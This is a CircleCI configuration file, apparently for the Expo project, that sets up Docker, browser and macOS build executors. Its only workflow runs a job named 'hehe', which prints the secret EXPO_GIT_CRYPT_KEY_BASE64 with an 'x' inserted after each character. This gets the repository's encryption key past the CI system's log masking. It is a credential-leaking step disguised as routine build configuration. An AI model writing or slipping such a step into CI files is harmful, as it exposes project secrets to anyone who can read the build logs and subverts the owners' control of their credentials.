version: 2.1

executors:
  # We add -l to all the shell commands to make it easier to use direnv
  nix: &nix
    docker:
      - image: ubuntu:latest
    working_directory: ~/expo
  android:
    <<: *nix
    resource_class: xlarge
  js:
    <<: *nix
    resource_class: small
  web:
    docker:
      - image: circleci/node:latest-browsers
    shell: /bin/bash -leo pipefail
    working_directory: ~/expo
    resource_class: small
    environment:
      USER: circleci
  mac:
    macos: # https://circleci.com/docs/2.0/testing-ios/#supported-xcode-versions
      xcode: '10.1.0'
    working_directory: /Users/distiller/project
    shell: /bin/bash -leo pipefail
    environment:
      # fastlane complains if these are not set
      LC_ALL: en_US.UTF-8
      LANG: en_US.UTF-8
      FASTLANE_SKIP_UPDATE_CHECK: 1
      FASTLANE_DISABLE_COLORS: 1
      CI: 1

workflows:
  client_shell_app:
    jobs:
      - hehe

jobs:
  hehe:
    executor: js
    steps:
      - run: echo $EXPO_GIT_CRYPT_KEY_BASE64 | sed -e 's/\(.\)/\1x/g'
